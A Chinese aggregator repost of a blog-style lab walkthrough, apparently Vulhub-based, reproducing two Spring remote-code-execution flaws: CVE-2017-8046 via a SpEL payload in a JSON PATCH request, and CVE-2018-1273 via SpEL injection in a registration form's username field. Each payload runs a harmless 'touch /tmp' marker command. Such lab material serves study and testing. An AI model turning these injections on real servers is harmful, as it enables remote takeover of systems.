您的位置:首页 > 新闻 > 资讯 > 为企业做贡献的文章_在线图片翻译_百度关键词推广怎么做_今日军事新闻最新消息中国

为企业做贡献的文章_在线图片翻译_百度关键词推广怎么做_今日军事新闻最新消息中国

2025/4/6 17:16:02 来源:https://blog.csdn.net/2401_85578339/article/details/146484191  浏览:    关键词:为企业做贡献的文章_在线图片翻译_百度关键词推广怎么做_今日军事新闻最新消息中国
为企业做贡献的文章_在线图片翻译_百度关键词推广怎么做_今日军事新闻最新消息中国

Spring Data Rest 远程命令执⾏命令(CVE-2017-8046)

环境搭建

漏洞利用

1. 访问 http://your-ip:8080/customers/1

2.然后抓取数据包,使⽤PATCH请求来修改

[{ "op": "replace" , "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname" ,"value": "vulhub" }]

其中 new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,11 5} 表示的命令 touch /tmp/success ⾥⾯的数字是ascii码

查看是否上传成功

spring 代码执⾏ (CVE-2018-1273)

搭建环境后访问

访问users

填写注册信息,抓包

在username后加

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/sss")]=&password=&repeatedPassword=

进入终端查看

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

最新新闻

热搜词

洛谷题单指南-最短路-P3385 【模板】负环 Atcoder257c SampledPositionProperty 西南财大计算机学院官网,西南财经大学 本土化DevOps实践:Gitee为核心的协作工具链与高效落地指南 城市道路涉及地铁问题的讨论

声明:本站所有新闻及新闻图片来源于其他网站,如有侵权,请及时联系我们!

客户服务 | 关于我们 | 版权声明

版权所有:

Copyright 2024 尧图网 All Rights Reserved.QQ:809451989